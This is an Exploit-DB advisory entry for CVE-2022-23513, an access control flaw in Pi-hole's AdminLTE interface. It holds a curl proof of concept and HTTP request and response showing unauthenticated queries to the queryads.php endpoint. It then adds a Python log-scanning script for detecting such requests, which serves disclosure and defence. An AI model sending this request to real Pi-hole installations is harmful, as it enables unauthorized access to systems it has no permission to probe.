Vendor: PiHole
By: kv1to
CVSS: N/A
Broken Access Control
CWE: Unknown
Product Name: PiHole
Affected Version From: Pi-hole v5.14.2; FTL v5.19.2; Web Interface v5.17
Affected Version To: Unknown
Patch Exists: NO
Related CWE: CVE-2022-23513
CPE: Unknown
Metasploit:
Other Scripts:
Platforms Tested: Raspbian / Debian
2022

AdminLTE PiHole < 5.18 - Broken Access Control

A successful attack lets the threat actor send unauthorized queries for blocked domains to the queryads endpoint.

Mitigation: Unknown

Exploit-DB raw data:

# Exploit Title: AdminLTE PiHole < 5.18 - Broken Access Control
# Google Dork: [inurl:admin/scripts/pi-hole/phpqueryads.php](https://vuldb.com/?exploit_googlehack.216554)
# Date: 21.12.2022
# Exploit Author: kv1to
# Version: Pi-hole v5.14.2; FTL v5.19.2; Web Interface v5.17
# Tested on: Raspbian / Debian
# Vendor: https://github.com/pi-hole/AdminLTE/security/advisories/GHSA-6qh8-6rrj-7497
# CVE : CVE-2022-23513

In case of an attack, the threat actor will obtain the ability to perform an unauthorized query for blocked domains on the queryads endpoint.

## Proof Of Concept with curl:
curl 'http://pi.hole/admin/scripts/pi-hole/php/queryads.php?domain=<searchquery>'

## HTTP requests
GET /admin/scripts/pi-hole/php/queryads.php?domain=<searchquery> HTTP/1.1
HOST: pi.hole
Cookie: [..SNIPPED..]
[..SNIPPED..]

## HTTP Response
HTTP/1.1 200 OK
[..SNIPPED..]

data: Match found in [..SNIPPED..]
data: <domain>
data: <domain>
data: <domain>
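
For detection, the following added example (not part of the original exploit entry or of Pi-hole's code) scans web server access logs for successful requests to the queryads endpoint from clients outside an expected set of admin hosts. Access logs do not record whether a session cookie was sent, so the source allow-list stands in for authorization; the combined-style log format, the ADMIN_NETS value and the sample lines are assumptions constructed for illustration.

```python
import ipaddress
import re
from collections import defaultdict
from urllib.parse import parse_qs, unquote, urlsplit

QUERYADS_PATH = "/admin/scripts/pi-hole/php/queryads.php"  # from the PoC on this page
# Assumption: hosts expected to use the admin interface (hypothetical value).
ADMIN_NETS = [ipaddress.ip_network("192.168.1.10/32")]
# Assumption: combined-style log: client, two fields, [time], "request", status.
LOG_RE = re.compile(r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"[A-Z]+ (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')
# Constructed sample lines, not taken from a real system.
SAMPLE_LOG = [
    '192.168.1.10 pi.hole - [21/Dec/2022:10:00:01 +0000] "GET /admin/scripts/pi-hole/php/queryads.php?domain=example.com HTTP/1.1" 200 312 "-" "Mozilla/5.0"',
    '192.168.1.77 pi.hole - [21/Dec/2022:10:02:13 +0000] "GET /admin/scripts/pi-hole/php/queryads.php?domain=ads.example.net HTTP/1.1" 200 298 "-" "curl/7.74.0"',
    '192.168.1.77 pi.hole - [21/Dec/2022:10:02:15 +0000] "GET /admin//scripts/pi-hole/php/queryads.php?domain=tracker.example.org HTTP/1.1" 200 150 "-" "curl/7.74.0"',
    '192.168.1.77 pi.hole - [21/Dec/2022:10:02:20 +0000] "GET /admin/index.php HTTP/1.1" 200 5120 "-" "curl/7.74.0"',
    '192.168.1.80 pi.hole - [21/Dec/2022:10:03:00 +0000] "GET /admin/scripts/pi-hole/php/queryads.php?domain=x.example HTTP/1.1" 403 0 "-" "curl/7.74.0"',
]


def is_admin(src):
    try:
        addr = ipaddress.ip_address(src)
    except ValueError:  # hostname or malformed client field
        return False
    return any(addr in net for net in ADMIN_NETS)


def find_queryads_hits(lines):
    """Map each non-admin source to the (time, domain) pairs it queried."""
    hits = defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m["status"] != "200":  # the response shown on this page is 200 OK
            continue
        url = urlsplit(m["target"])
        # Decode and collapse repeated slashes so path variants still match.
        path = re.sub(r"/+", "/", unquote(url.path))
        if path != QUERYADS_PATH or is_admin(m["src"]):
            continue
        domain = parse_qs(url.query).get("domain", [""])[0]
        hits[m["src"]].append((m["ts"], domain))
    return dict(hits)


if __name__ == "__main__":
    for src, queries in find_queryads_hits(SAMPLE_LOG).items():
        print(src, queries)
```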